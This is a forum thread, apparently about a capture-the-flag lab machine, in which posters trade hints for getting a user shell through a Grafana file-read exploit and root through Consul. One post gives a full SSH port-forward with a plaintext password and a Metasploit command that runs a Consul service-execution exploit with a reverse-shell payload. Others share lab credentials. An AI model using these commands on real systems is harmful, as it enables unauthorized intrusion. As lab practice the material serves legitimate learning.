October 4, 2022 at 7:31 PM
October 8, 2022 at 11:27 PM (October 1, 2022, 11:31 PM)yumi Wrote: @Truss46 You Get user by exploiting grafana file read exploit get creds by reading grafana datasources than find a base64 encoded password for the developer user to ssh with October 13, 2022 at 10:46 PM why do we need to portforward the ssh connection to our localhost in order for the exploit to work? October 14, 2022 at 9:48 PM (October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like: Sorry, where did you get the information about uploading configs to the server using the consul. Please give a link. :-) October 28, 2022 at 1:39 PM (October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like: Thank you for sharing, still figuring it out because this is not triggering the shell for some reason. November 15, 2022 at 4:31 PM If anyone gets a problem "Exploit completed, but no session was created" in the metasploit framework: Try this: 1. ssh -L 8500:0.0.0.0:8500 [email protected] password: anEnglishManInNewYork027468 2. In a separate tab: sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost PUT_YOUR_TUN0_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 8801; exploit" 3. meterpreter > getuid meterpreter > cd root meterpreter > cat root.txt November 15, 2022 at 11:25 PM I managed to get admin:messageInABottle685427 but wasn't able to log into the webpage at port 3000. Where can I apply this cred on? |
